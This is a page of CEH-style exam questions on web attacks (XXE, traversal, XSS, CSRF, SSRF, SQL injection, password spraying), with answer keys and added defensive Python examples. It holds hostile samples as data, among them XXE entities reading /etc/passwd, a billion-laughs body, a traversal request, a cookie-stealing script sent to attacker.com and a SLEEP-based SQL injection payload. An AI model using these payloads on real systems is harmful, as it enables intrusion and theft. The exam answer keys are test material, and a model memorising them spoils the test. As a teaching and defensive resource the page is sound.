
CEH Web Application and Injection Attacks Questions

22 of 172 questions · Page 3/3 · Web Application and Injection Attacks · Answers revealed

151 · Multi-Select · easy

A web application is vulnerable to XML External Entity (XXE) injection. Which THREE of the following are potential impacts of successfully exploiting an XXE vulnerability?

Select 3 answers
A. SQL injection
B. Arbitrary file read on the server
C. Denial of Service (DoS)
D. Server-Side Request Forgery (SSRF)
E. Remote code execution via command injection
Answers: B, C, D

XXE allows reading files via external entities.

Why this answer

XXE lets the attacker define an entity that the XML parser resolves on the server: a file:// entity reads local files (e.g., /etc/passwd) into the document, an http:// entity makes the server issue a request on the attacker's behalf (SSRF, including to internal services), and recursively nested internal entities exhaust parser memory (the billion laughs DoS). Code execution is possible only in specific configurations (e.g., PHP's expect:// wrapper) and is not command injection, so E is not one of the three expected answers, and XXE has nothing to do with SQL injection.
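Added example (not part of the question bank or any EC-Council material): a small classifier that recognises the three XXE impacts above in a request body, and a parse function that refuses any DOCTYPE, which is the parser-independent fix OWASP recommends. The XML bodies are constructed samples and the element names are hypothetical.

```python
"""Classify XML request bodies for XXE indicators and parse only DOCTYPE-free XML.

Added example, not from the question bank. The request bodies below are
constructed samples, not captured traffic.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample bodies for a hypothetical application that expects <order> documents.
SAMPLES = {
    "benign": b"<?xml version='1.0'?><order><id>42</id></order>",
    "file_read": (
        b"<?xml version='1.0'?>"
        b'<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        b"<order><id>&xxe;</id></order>"
    ),
    "ssrf": (
        b"<?xml version='1.0'?>"
        b'<!DOCTYPE order [<!ENTITY xxe SYSTEM "http://10.0.0.5:8080/admin">]>'
        b"<order><id>&xxe;</id></order>"
    ),
    "billion_laughs": (
        b"<?xml version='1.0'?>"
        b"<!DOCTYPE lolz ["
        b'<!ENTITY lol "lol">'
        b'<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">'
        b'<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">'
        b"]><lolz>&lol3;</lolz>"
    ),
}

DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
# External entity: <!ENTITY name SYSTEM "uri"> or <!ENTITY name PUBLIC "id" "uri">
EXTERNAL_RE = re.compile(
    rb'<!ENTITY\s+(?:%\s+)?\w+\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"(?P<uri>[^"]*)"',
    re.IGNORECASE,
)
# Internal entity: <!ENTITY name "value">
INTERNAL_RE = re.compile(rb'<!ENTITY\s+\w+\s+"(?P<val>[^"]*)"', re.IGNORECASE)


def classify_xxe(body: bytes) -> str:
    """Return the likely XXE impact: none, file_read, ssrf, dos, or doctype (DTD without entities)."""
    if not DOCTYPE_RE.search(body):
        return "none"
    for m in EXTERNAL_RE.finditer(body):
        uri = m.group("uri").lower()
        if uri.startswith(b"file:"):
            return "file_read"
        if uri.startswith((b"http:", b"https:", b"ftp:", b"gopher:")):
            return "ssrf"
    # Internal entities that reference other entities are the billion-laughs pattern.
    for m in INTERNAL_RE.finditer(body):
        if b"&" in m.group("val"):
            return "dos"
    return "doctype"


def safe_parse(body: bytes) -> ET.Element:
    """Parse XML only if it carries no DOCTYPE at all, so no entity of any kind is defined."""
    if DOCTYPE_RE.search(body):
        raise ValueError("DOCTYPE declarations are not accepted")
    return ET.fromstring(body)
```

Python's standard-library parser does not fetch external entities by default, but lxml with resolve_entities enabled or a Java DocumentBuilderFactory with default settings will; rejecting the DOCTYPE up front works the same whichever parser sits behind the endpoint.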

152 · MCQ · easy

Which of the following is the BEST defense against brute-force attacks on a login form?

A. Rate limiting on the login endpoint
B. CAPTCHA
C. Complex password policy
D. Account lockout after 5 failed attempts
Answer: A

Rate limiting throttles every attempt against the endpoint, whereas account lockout only reacts per account after the fact and can be turned into a denial of service against legitimate users.

Why this answer

Rate limiting on the login endpoint is the best answer because it directly bounds how many guesses an attacker can submit in a given time window, which makes exhaustive guessing impractical regardless of password strength. Unlike lockout, it needs no per-account failure counter that an attacker can deliberately trip to lock legitimate users out. To stay effective against distributed attacks that rotate source IP addresses, the limit should be keyed on the target username (and, where available, a device or session identifier) as well as on the client IP.

Exam trap

EC-Council often tests the misconception that account lockout is the strongest defense. The trap is that lockout can be abused to deny service to legitimate users and can be sidestepped by spreading a few guesses across many accounts (password spraying), whereas rate limiting is a proactive control that scales and can be applied before any account state is touched.

How to eliminate wrong answers

Option B (CAPTCHA) is wrong because, while it slows automated attacks, it can be bypassed using OCR, machine learning, or third-party solving services, and it degrades the user experience. Option C (Complex password policy) is wrong because it only enlarges the search space; it does not stop the attempts themselves, and an attacker with unlimited tries can still work through millions of candidates over time. Option D (Account lockout after 5 failed attempts) is wrong because it is a reactive measure that an attacker can exploit to lock legitimate users out, and it is sidestepped by spraying a few common passwords across many usernames so that no single account reaches the threshold.
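Added example (not code from the question bank): a sliding-window limiter that throttles login attempts per source IP and per target username without ever locking an account, run against two constructed attack patterns. The class name, window size and thresholds are my own choices for illustration; tune them to real traffic.

```python
"""Sliding-window rate limiter for a login endpoint, keyed per IP and per username.

Added example, not code from the question bank. LoginRateLimiter and the
thresholds below are hypothetical; tune the window and limits to your traffic.
"""
from collections import deque
from typing import Deque, Dict, Tuple


class LoginRateLimiter:
    """Throttle login attempts without locking accounts.

    Two independent windows are kept: one per source IP (catches a single host
    hammering many accounts) and one per target username (catches a distributed
    attacker rotating IPs against one account). Neither window ever disables the
    account, so the limiter cannot be weaponised into a denial of service.
    """

    def __init__(self, window_s: float = 60.0, per_ip: int = 20, per_user: int = 5):
        self.window_s = window_s
        self.per_ip = per_ip
        self.per_user = per_user
        self._ip_hits: Dict[str, Deque[float]] = {}
        self._user_hits: Dict[str, Deque[float]] = {}

    def _prune(self, hits: Deque[float], now: float) -> None:
        # Drop timestamps that have aged out of the sliding window.
        while hits and now - hits[0] >= self.window_s:
            hits.popleft()

    def check(self, ip: str, username: str, now: float) -> Tuple[bool, str]:
        """Return (allowed, reason). Only allowed attempts are recorded, so a flood
        of rejected requests does not extend the throttle for a legitimate user."""
        ip_hits = self._ip_hits.setdefault(ip, deque())
        user_hits = self._user_hits.setdefault(username.lower(), deque())
        self._prune(ip_hits, now)
        self._prune(user_hits, now)
        if len(ip_hits) >= self.per_ip:
            return False, "ip_throttled"
        if len(user_hits) >= self.per_user:
            return False, "user_throttled"
        ip_hits.append(now)
        user_hits.append(now)
        return True, "ok"


def simulate_distributed_attack(limiter: LoginRateLimiter) -> Dict[str, int]:
    """Constructed traffic: 30 guesses against 'alice' from 30 different IPs within
    one second, the pattern that a purely per-IP control would miss."""
    outcome = {"ok": 0, "ip_throttled": 0, "user_throttled": 0}
    for i in range(30):
        _, reason = limiter.check(f"203.0.113.{i}", "alice", now=1000.0 + i * 0.03)
        outcome[reason] += 1
    return outcome


def simulate_single_host_spray(limiter: LoginRateLimiter) -> Dict[str, int]:
    """Constructed traffic: one IP trying a single password against 25 different
    users, the pattern that a per-account lockout would miss."""
    outcome = {"ok": 0, "ip_throttled": 0, "user_throttled": 0}
    for i in range(25):
        _, reason = limiter.check("198.51.100.7", f"user{i}", now=2000.0 + i * 0.05)
        outcome[reason] += 1
    return outcome
```

In production the counters would normally track failed attempts only and live in a shared store such as Redis, and the throttle would escalate (exponential backoff, then CAPTCHA) rather than reject outright; the two keys are what matter for the exam point, since the per-user window stops the distributed attack that defeats IP-based lockout and the per-IP window stops the spray that defeats account lockout.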

153 · Multi-Select · hard

A security analyst is reviewing a web application log and sees the following request: GET /page?file=../../../etc/passwd HTTP/1.1. Which TWO vulnerabilities are most likely being attempted? (Select two)

Select 2 answers
A. Directory traversal
B. Remote file inclusion (RFI)
C. SQL injection
D. Local file inclusion (LFI)
E. Command injection
Answers: A, D

The '../' pattern indicates an attempt to access files outside the web root.

Why this answer

The '../' sequences walk up out of the directory the application intends to serve from (directory, or path, traversal), and the target is a local file on the server rather than a remote URL, so if the parameter is passed to an include/require-style call the same request is also a local file inclusion (LFI) attempt. RFI would need a remote URL (http://...), SQL injection would use quotes and SQL syntax, and command injection would use shell metacharacters such as ; or |.
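Added example (not from the question bank) covering this question and question 167: the vulnerable file fetch beside a hardened version that decodes, resolves and then checks that the path stays under the served directory, plus a log check for plain and percent-encoded traversal sequences. The web root, its files and the request lines are constructed in a temporary directory for the example.

```python
"""Path traversal: the vulnerable file fetch beside the hardened one, plus a log check.

Added example, not from the question bank. BASE_DIR and the files in it are
constructed in a temporary directory; the request lines are made up.
"""
import os
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Constructed web root: one legitimate page inside the served directory and a
# file one level above it that must never be reachable.
BASE_DIR = Path(tempfile.mkdtemp(prefix="webroot-"))
(BASE_DIR / "pages").mkdir()
(BASE_DIR / "pages" / "about.html").write_text("<h1>About</h1>")
(BASE_DIR / "secret.txt").write_text("TOP SECRET")


def fetch_vulnerable(filename: str) -> str:
    """String concatenation: '../' walks out of the served directory."""
    with open(os.path.join(BASE_DIR, "pages", filename)) as f:
        return f.read()


def fetch_hardened(filename: str) -> str:
    """Resolve the requested path and refuse anything outside the allowed directory.

    Decoding happens first so %2e%2e%2f cannot slip past the check, and the
    comparison is done on resolved absolute paths, which also defeats symlinks
    that point outside the root. Requesting the directory itself is refused too.
    """
    allowed = (BASE_DIR / "pages").resolve()
    candidate = (allowed / unquote(filename)).resolve()
    if allowed not in candidate.parents:
        raise PermissionError(f"refusing path outside web root: {filename!r}")
    return candidate.read_text()


# Plain, backslash and single/double URL-encoded forms of '../'.
TRAVERSAL_RE = re.compile(
    r"(\.\./|\.\.\\|%2e%2e%2f|%2e%2e/|\.\.%2f|%2e%2e%5c|%252e%252e%252f)", re.IGNORECASE
)


def flag_traversal(log_line: str) -> bool:
    """Flag a request line that carries a traversal sequence in any of those encodings."""
    return bool(TRAVERSAL_RE.search(log_line))
```

Deny-listing '../' in the input is the wrong fix (encodings, overlong UTF-8 and Windows backslashes keep slipping through); resolving the final path and checking its prefix is the check that holds.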

154 · MCQ · medium

A penetration tester is assessing a web application and notices that the application reflects the User-Agent header in the response body without sanitization. What attack could be performed using this behavior?

A. Cross-Site Scripting (XSS)
B. Directory traversal
C. Server-Side Request Forgery (SSRF)
D. SQL injection
Answer: A

Reflecting user input (User-Agent) without sanitization allows XSS.

Why this answer

Any client controls its own User-Agent header, so echoing it into the page without encoding is reflected XSS: the payload arrives in the request and executes in that same response. Because a victim cannot be made to send a crafted User-Agent by clicking a link, the impact is low while it only hits the attacker's own session; it becomes serious when the value is logged and later rendered to another user such as an administrator, at which point it is stored XSS.

155 · MCQ · medium

An attacker performs a password spraying attack against a web application. Which of the following BEST describes this technique?

A. Using a list of compromised credentials from a data breach
B. Trying many passwords for a single account
C. Trying a few common passwords against many accounts
D. Using automated tools to bypass CAPTCHA
Answer: C

Password spraying targets many accounts with a small set of common passwords to avoid lockouts.

Why this answer

Password spraying uses a few common passwords against many accounts to avoid account lockout.

156 · Multi-Select · hard

A web application uses cookies for session management. The application is vulnerable to CSRF. Which THREE of the following are effective mitigation techniques? (Choose THREE.)

Select 3 answers
A. Implementing Multi-Factor Authentication (MFA)
B. Using HTTP GET requests for state-changing operations
C. Setting SameSite cookies to Lax or Strict
D. Including a unique CSRF token in each request
E. Validating the Origin or Referer header
Answers: C, D, E

The SameSite attribute stops the browser attaching the session cookie to cross-site requests (Lax still allows top-level GET navigations, which is one reason state changes must not use GET).

Why this answer

SameSite cookies stop the browser attaching the session cookie to cross-site requests. A CSRF token is an unpredictable per-session (or per-request) secret that the attacker's page cannot read, so a forged request cannot include it. Checking the Origin header (or, when it is absent, the Referer) rejects requests that did not originate from the application's own origin.

Double-submit cookies and custom request headers (e.g., X-Requested-With) are further valid defenses not offered here. MFA does not prevent CSRF because the forged request rides on a session that has already passed authentication, and using GET for state changes makes CSRF easier, not harder.

157 · MCQ · easy

Which of the following tools is primarily used for automated SQL injection exploitation and database fingerprinting?

A. SQLMap
B. Nmap
C. Burp Suite
D. John the Ripper
Answer: A

SQLMap is designed for automated SQL injection.

Why this answer

SQLMap is the industry-standard tool for automating SQL injection detection and exploitation.

158 · MCQ · medium

In Burp Suite, which tool is used to modify and resend individual HTTP requests to observe responses, allowing manual testing of input validation and parameter manipulation?

A. Repeater
B. Proxy
C. Scanner
D. Intruder
Answer: A

Repeater allows sending and resending individual requests with manual modifications.

Why this answer

Burp Repeater is designed for manually crafting and resending requests to see individual responses, ideal for testing parameter handling.

159 · Multi-Select · hard

During a penetration test, a tester observes that a web application's login form does not implement rate limiting and returns different error messages for valid vs invalid usernames. Which THREE attacks are most likely to be successful? (Select three)

Select 3 answers
A. Directory traversal
B. Credential stuffing
C. Brute-force attack
D. SQL injection
E. Password spraying
Answers: B, C, E

Valid usernames can be used with breached password lists.

Why this answer

With username enumeration and no rate limiting, brute force (trying many passwords on one user), credential stuffing (using breached credentials), and password spraying (trying common passwords across many users) are all viable. SQL injection is not directly related to the described conditions.

160 · MCQ · hard

After a security incident, logs show repeated login attempts from different IP addresses using a list of common passwords against a single username. Which attack technique is being used?

A. Credential stuffing
B. Brute force attack
C. Password spraying
D. Dictionary attack
Answer: C

Password spraying uses a few common passwords against many accounts, or (as keyed here) against a single account from many IPs.

Why this answer

The exam keys this as password spraying because the attacker uses a short list of common passwords and rotates source IPs to stay under lockout and per-IP thresholds. Strictly, password spraying (MITRE ATT&CK T1110.003) means a few passwords tried across many accounts; a common-password list aimed at one account from many IPs is a distributed dictionary attack (T1110.001, password guessing). On the exam choose C; in an incident write-up describe the pattern actually observed (one account, many sources).

161 · MCQ · medium

A security analyst notices that after submitting a form on a web application, the URL changes to include the user's ID parameter, e.g., 'user?id=123'. The analyst modifies the ID in the URL and accesses another user's profile without authorization. Which type of vulnerability is being exploited?

A. Reflected Cross-Site Scripting (XSS)
B. Command Injection
C. Cross-Site Request Forgery (CSRF)
D. Insecure Direct Object Reference (IDOR)
Answer: D

IDOR occurs when an application exposes references (e.g., user ID) and fails to verify authorization, allowing attackers to access other objects.

Why this answer

This is an Insecure Direct Object Reference (IDOR) vulnerability, where the application exposes internal object references (like user IDs) without proper access control checks.

162 · MCQ · medium

A security analyst observes that a web application allows users to submit feedback, and after submission, the feedback is displayed on a public page. An attacker submits feedback containing the script: <script>document.location='http://attacker.com/?c='+document.cookie</script>. When an admin views the public page, the script executes. Which type of attack occurred?

A. Reflected XSS
B. Cross-site request forgery (CSRF)
C. DOM-based XSS
D. Stored XSS
Answer: D

The malicious script is stored in the feedback database and executed when the admin retrieves it.

Why this answer

The script is stored on the server (feedback) and executed when the admin views the page. This is persistent (stored) XSS.

163 · Multi-Select · medium

Which TWO of the following are characteristics of a reflected Cross-Site Scripting (XSS) attack? (Select 2)

Select 2 answers
A. The attack is typically delivered through a crafted link
B. The script executes in the server-side context
C. The attack affects all users who visit the compromised page without any interaction
D. The malicious script is reflected off the web server in the response
E. The malicious script is permanently stored on the server
Answers: A, D

Reflected XSS often requires the victim to click a malicious link.

Why this answer

Reflected XSS requires user interaction (clicking a link) and does not persist on the server.

164 · MCQ · hard

An analyst reviews a web server log and sees the following request: GET /search?q=<script>alert('xss')</script> HTTP/1.1. The response from the server includes the search term inside a <div> tag without any sanitization. Which type of XSS vulnerability does this indicate?

A. Stored XSS
B. Reflected XSS
C. DOM-based XSS
D. Blind XSS
Answer: B

The script is injected via a URL parameter and immediately reflected in the server's response, which is the definition of reflected XSS.

Why this answer

This is a typical reflected XSS because the malicious script is injected via a GET parameter and immediately reflected in the response without persistent storage.

165 · MCQ · easy

An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP request to a sensitive internal service. Which type of attack is this?

A. CSRF
B. XXE
C. SSRF
D. IDOR
Answer: C

SSRF involves the server making unintended requests to internal or external systems.

Why this answer

SSRF (Server-Side Request Forgery) occurs when an attacker can induce the server to make requests to internal resources.
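Added example (not from the question bank): the validation a server should run on a user-supplied URL before fetching it, refusing non-HTTP schemes, embedded credentials, unresolvable hosts and any name that resolves to a private, loopback or link-local address (where cloud metadata services such as 169.254.169.254 live). The DNS answers are a constructed table so the example runs offline; the hostnames and function names are hypothetical.

```python
"""Outbound URL validation against SSRF, for the scenario in question 165.

Added example, not from the question bank. FAKE_DNS is a constructed
hostname -> IP table standing in for real resolution so the example runs
offline; the function signatures are my own.
"""
import ipaddress
from typing import Callable, List, Union
from urllib.parse import urlsplit

IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]

# Constructed DNS answers for hypothetical names.
FAKE_DNS = {
    "api.partner.example": ["93.184.216.34"],
    "metadata.google.internal": ["169.254.169.254"],
    "rebind.attacker.example": ["93.184.216.35", "10.0.0.5"],  # one public, one private
}

ALLOWED_SCHEMES = {"http", "https"}


def is_internal(ip: IPAddress) -> bool:
    """Private, loopback, link-local (cloud metadata lives here), multicast,
    reserved and unspecified addresses are all off limits for server-side fetches."""
    return (
        ip.is_private or ip.is_loopback or ip.is_link_local
        or ip.is_multicast or ip.is_reserved or ip.is_unspecified
    )


def resolve(host: str, resolver: Callable[[str], List[str]]) -> List[IPAddress]:
    """Accept IP literals directly; otherwise ask the resolver. Unknown names and
    odd literals such as 127.1 or a decimal integer fail closed (empty list)."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        pass
    try:
        return [ipaddress.ip_address(a) for a in resolver(host)]
    except (KeyError, ValueError):
        return []


def validate_outbound_url(url: str,
                          resolver: Callable[[str], List[str]] = FAKE_DNS.__getitem__) -> str:
    """Return 'ok' or the reason the URL is refused.

    Every address the name resolves to must be external: if any answer is
    internal (split-horizon DNS or a rebinding setup) the whole request is refused.
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        return "credentials in URL not allowed"
    host = parts.hostname
    if not host:
        return "missing host"
    addrs = resolve(host, resolver)
    if not addrs:
        return f"cannot resolve {host!r}"
    for ip in addrs:
        if is_internal(ip):
            return f"{host!r} resolves to internal address {ip}"
    return "ok"
```

Validating at check time is not enough on its own: the HTTP client must connect to the address that was validated (pin the resolved IP, or re-check in the connection hook) and must not follow redirects blindly, otherwise a name that changes its answer between the check and the fetch, or a 302 to http://127.0.0.1, reopens the hole. An allow-list of permitted destinations is stronger still where the application only ever needs to reach a few known hosts.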

166 · MCQ · easy

Which of the following tools is specifically designed to automate the process of detecting and exploiting SQL injection vulnerabilities in web applications?

A. Burp Suite
B. Metasploit
C. SQLMap
D. Nmap
Answer: C

SQLMap is the standard tool for automated SQL injection detection and exploitation.

Why this answer

SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws. It supports a wide range of database backends and injection techniques, making it the go-to tool for this specific task.

Exam trap

EC-Council often tests the distinction between general-purpose security tools (like Burp Suite or Metasploit) and specialized automation tools (like SQLMap), leading candidates to choose a tool they recognize for web testing rather than the one specifically designed for SQL injection automation.

How to eliminate wrong answers

Option A is wrong because Burp Suite is an intercepting proxy and web application security testing platform that requires manual configuration or extensions to automate SQL injection exploitation; it is not purpose-built for automated SQL injection detection and exploitation. Option B is wrong because Metasploit is a framework for developing and executing exploit code against remote targets, but it does not natively automate the detection and exploitation of SQL injection vulnerabilities in web applications without additional modules or manual scripting. Option D is wrong because Nmap is a network scanning tool used for host discovery, port scanning, and service enumeration, and it lacks any capability to detect or exploit SQL injection vulnerabilities.

167 · MCQ · medium

During a penetration test, you identify a parameter in a web application that appears to fetch a file from the server. You modify the parameter to '../../../etc/passwd' and see the contents of the passwd file. Which type of vulnerability is this?

A. Remote File Inclusion (RFI)
B. Directory traversal
C. Server-Side Request Forgery (SSRF)
D. Local File Inclusion (LFI)
Answer: B

The attacker is traversing directories to read arbitrary files, which is directory traversal.

Why this answer

The use of '../' sequences to climb out of the intended directory and read files outside the web root is classic directory (path) traversal. LFI is the closely related case where the application passes the path to an include-style call, so the file is executed rather than merely returned; because the scenario only shows the file's contents being disclosed, directory traversal is the keyed answer. RFI would require a remote URL, and SSRF would have the server fetch a URL on the attacker's behalf rather than read its own filesystem.

168 · Multi-Select · hard

Which THREE of the following are valid defenses against CSRF attacks? (Select 3)

Select 3 answers
A. Custom request headers (e.g., X-Requested-With)
B. SameSite cookies set to Lax or Strict
C. CSRF tokens
D. Input validation
E. Output encoding
Answers: A, B, C

Custom headers work as a CSRF check because a cross-origin request that carries a non-standard header is no longer a "simple" request: the browser first sends a CORS preflight, which the server does not approve, so the forged request never reaches the endpoint with the header set.

Why this answer

CSRF tokens, SameSite cookies (Lax or Strict), and custom headers (e.g., X-Requested-With with XMLHttpRequest) are all effective CSRF defenses.
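Added example (not from the question bank) for this question and question 156: the server-side checks behind three of the defenses, a synchronizer token compared in constant time, an Origin/Referer check, and a SameSite session cookie, applied to a constructed legitimate request and a constructed cross-site forgery. SITE_ORIGIN, the request dictionaries and the helper names are assumptions made for the example.

```python
"""CSRF defenses from questions 156 and 168: Origin check, synchronizer token, SameSite cookie.

Added example, not code from the question bank. The request dictionaries are
constructed; SITE_ORIGIN and the header names are assumptions for illustration.
"""
import hmac
import secrets
from typing import Dict, Tuple

SITE_ORIGIN = "https://app.example.com"   # assumed application origin

# Server-side session store: session id -> per-session CSRF token (constructed).
SESSIONS: Dict[str, str] = {}


def new_session() -> Tuple[str, str]:
    """Create a session and its CSRF token; return (session_id, csrf_token)."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = secrets.token_urlsafe(32)
    return sid, SESSIONS[sid]


def session_cookie_header(sid: str) -> str:
    """Set-Cookie value: SameSite=Lax keeps the cookie off cross-site POSTs,
    Secure and HttpOnly limit theft over plaintext and via script."""
    return f"session={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


def check_origin(headers: Dict[str, str]) -> bool:
    """Accept only requests whose Origin (or, if absent, Referer) is our own origin.
    Neither header present means reject: fail closed."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer", "")
        origin = SITE_ORIGIN if referer.startswith(SITE_ORIGIN + "/") else None
    return origin == SITE_ORIGIN


def check_token(sid: str, submitted: str) -> bool:
    """Constant-time comparison of the submitted token against the session's token."""
    expected = SESSIONS.get(sid)
    return expected is not None and hmac.compare_digest(expected, submitted)


def authorize_state_change(request: Dict) -> Tuple[bool, str]:
    """Apply the checks to a state-changing request: method, origin, then token."""
    if request["method"] != "POST":
        return False, "state changes must use POST"
    if not check_origin(request["headers"]):
        return False, "bad origin"
    sid = request["cookies"].get("session")
    if sid is None or not check_token(sid, request["form"].get("csrf_token", "")):
        return False, "missing or wrong csrf token"
    return True, "ok"


# Constructed requests: the legitimate one and a forged cross-site form post.
SID, TOKEN = new_session()
LEGIT = {
    "method": "POST",
    "headers": {"Origin": SITE_ORIGIN},
    "cookies": {"session": SID},
    "form": {"amount": "100", "csrf_token": TOKEN},
}
FORGED = {
    "method": "POST",
    "headers": {"Origin": "https://evil.example"},
    "cookies": {"session": SID},        # the browser attached it (no SameSite) ...
    "form": {"amount": "100"},          # ... but the attacker's page cannot read the token
}
```

Each check catches a different failure: SameSite stops the cookie from travelling at all, the Origin check rejects the request even when it does, and the token rejects it even when an attacker spoofs or strips the Origin (some privacy tools strip Referer, which is why the code rejects rather than skips when both headers are missing; relax that only for endpoints that really need it).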

169 · Multi-Select · hard

Which THREE of the following are effective mitigation techniques against Cross-Site Scripting (XSS) attacks?

Select 3 answers
A. Output encoding
B. Implementing Content Security Policy (CSP)
C. Disabling JavaScript in the client browser
D. Using HTTPS for all communications
E. Input validation
Answers: A, B, E

Encoding output ensures that user input is treated as data, not executable code.

Why this answer

Input validation rejects input that does not match the expected format (a defence-in-depth measure, since not every field can be tightly constrained). Output encoding converts special characters to safe entities for the context where the data is emitted (HTML body, attribute, JavaScript string, URL), so the browser treats it as text rather than markup. Content Security Policy (CSP) restricts where scripts may load from and blocks inline script unless it carries a matching nonce or hash.

Disabling JavaScript is not practical. Using HTTPS protects data in transit but not against XSS.

170 · MCQ · medium

A penetration tester discovers that a web application's login page does not enforce rate limiting and several usernames are known from a prior data breach. The tester wants to try a few common passwords across many accounts to avoid account lockouts. Which attack technique is being used?

A. Password spraying
B. Credential stuffing
C. Brute force attack
D. Dictionary attack
Answer: A

Password spraying uses a few passwords across many accounts to avoid lockouts.

Why this answer

Password spraying involves trying a small number of common passwords against many user accounts to avoid account lockout. It contrasts with credential stuffing (replaying username/password pairs leaked in breaches), brute force (many passwords against one account) and dictionary attacks (a wordlist of likely passwords against one account).
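Added example (not from the question bank) for this question and questions 159 and 160: detection logic that separates the three failed-login patterns in an authentication log by their shape alone, since passwords are never logged. The log lines, field layout and thresholds are constructed for the example; the single-account, many-source pattern that question 160 keys as password spraying is labelled "distributed" here so the three cases stay distinct.

```python
"""Telling brute force, password spraying and distributed guessing apart from failed logins.

Added example, not from the question bank. The log lines are constructed in the
style of an application auth log; the field layout and thresholds are assumptions.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set

# Constructed sample: time, source IP, username, result.
AUTH_LOG = """\
2024-05-01T10:00:01Z ip=203.0.113.5 user=alice result=FAIL
2024-05-01T10:00:02Z ip=203.0.113.5 user=alice result=FAIL
2024-05-01T10:00:03Z ip=203.0.113.5 user=alice result=FAIL
2024-05-01T10:00:04Z ip=203.0.113.5 user=alice result=FAIL
2024-05-01T10:00:05Z ip=203.0.113.5 user=alice result=FAIL
2024-05-01T10:00:06Z ip=203.0.113.5 user=alice result=FAIL
2024-05-01T10:01:00Z ip=198.51.100.9 user=bob result=FAIL
2024-05-01T10:01:01Z ip=198.51.100.9 user=carol result=FAIL
2024-05-01T10:01:02Z ip=198.51.100.9 user=dave result=FAIL
2024-05-01T10:01:03Z ip=198.51.100.9 user=erin result=FAIL
2024-05-01T10:01:04Z ip=198.51.100.9 user=frank result=FAIL
2024-05-01T10:01:05Z ip=198.51.100.9 user=grace result=SUCCESS
2024-05-01T10:02:00Z ip=192.0.2.1 user=heidi result=FAIL
2024-05-01T10:02:00Z ip=192.0.2.2 user=heidi result=FAIL
2024-05-01T10:02:01Z ip=192.0.2.3 user=heidi result=FAIL
2024-05-01T10:02:01Z ip=192.0.2.4 user=heidi result=FAIL
2024-05-01T10:02:02Z ip=192.0.2.5 user=heidi result=FAIL
2024-05-01T10:02:02Z ip=192.0.2.6 user=heidi result=FAIL
2024-05-01T10:03:00Z ip=203.0.113.77 user=ivan result=SUCCESS
"""

LINE_RE = re.compile(r"ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>\S+)")


def parse(log: str) -> List[Dict[str, str]]:
    """Pull ip/user/result out of each line; lines that do not match are skipped."""
    return [m.groupdict() for m in (LINE_RE.search(line) for line in log.splitlines()) if m]


def classify(log: str, threshold: int = 5) -> Dict[str, str]:
    """Return {key: label} for every source IP or username at or over the threshold.

    brute_force     one IP, many failures against ONE account
    password_spray  one IP, failures spread across MANY distinct accounts
    distributed     ONE account failed from MANY IPs (the question 160 scenario)
    """
    fails_by_ip: Dict[str, List[str]] = defaultdict(list)   # ip -> users it failed on
    fails_by_user: Dict[str, Set[str]] = defaultdict(set)   # user -> ips that failed
    for e in parse(log):
        if e["result"] == "FAIL":
            fails_by_ip[e["ip"]].append(e["user"])
            fails_by_user[e["user"]].add(e["ip"])

    labels: Dict[str, str] = {}
    for ip, users in fails_by_ip.items():
        if len(users) < threshold:
            continue
        distinct = len(set(users))
        labels[f"ip:{ip}"] = "password_spray" if distinct >= threshold else "brute_force"
    for user, ips in fails_by_user.items():
        if len(ips) >= threshold:
            labels[f"user:{user}"] = "distributed"
    return labels
```

Credential stuffing looks like a spray in this view (one attempt per account across many accounts) but with a markedly higher success rate and usernames that match a known breach list; correlating the targeted usernames against breach data is what separates the two. The spray IP above also shows the reason the pattern is dangerous: its sixth attempt succeeded while no account ever crossed a lockout threshold.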

171 · MCQ · medium

A security analyst notices that the web application returns different response times when querying user IDs. For example, a valid user ID returns the page in 2 seconds, while an invalid ID returns in 0.5 seconds. The analyst suspects a blind SQL injection vulnerability. Which SQL injection technique is MOST likely being used?

A. Error-based SQL injection
B. Union-based SQL injection
C. Time-based blind SQL injection
D. Out-of-band SQL injection
Answer: C

Time-based uses conditional delays to infer Boolean results; response time differences are the key indicator.

Why this answer

Time-based blind SQL injection infers the truth of an injected condition from the response delay: the payload wraps a delay function (e.g., MySQL SLEEP(), MSSQL WAITFOR DELAY, PostgreSQL pg_sleep()) in a conditional, and the answer is read from how long the page takes rather than from its content. Note that a slow page for valid IDs and a fast one for invalid IDs is only a hint, since a query that finds a row may simply do more work; the vulnerability is confirmed when the delay tracks a condition the tester controls, for example when a payload of 1 AND SLEEP(5) takes about five seconds longer than 1 AND 0.
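Added example (not from the question bank): the inference loop behind blind SQL injection, run against an in-memory SQLite table built here, with the vulnerable string-built query beside the parameterized fix. SQLite has no SLEEP(), so the oracle is boolean (row returned or not) rather than time-based; a time-based attack is the same loop with the true/false page difference replaced by a measured delay. The table, its contents and the function names are constructed for the example.

```python
"""Blind SQL injection inference and the parameterized fix, for question 171.

Added example, not from the question bank. Uses an in-memory SQLite table built
here; the secret value is constructed.
"""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, api_key TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice', 'k3y')")   # constructed secret
conn.commit()


def lookup_vulnerable(user_id: str) -> bool:
    """Vulnerable: the id is spliced into the query text, so an attacker can append
    a condition and the page becomes a yes/no oracle (row found or not)."""
    row = conn.execute(f"SELECT name FROM users WHERE id = {user_id}").fetchone()
    return row is not None


def lookup_fixed(user_id: str) -> bool:
    """Fixed: the value is bound as a parameter and never parsed as SQL."""
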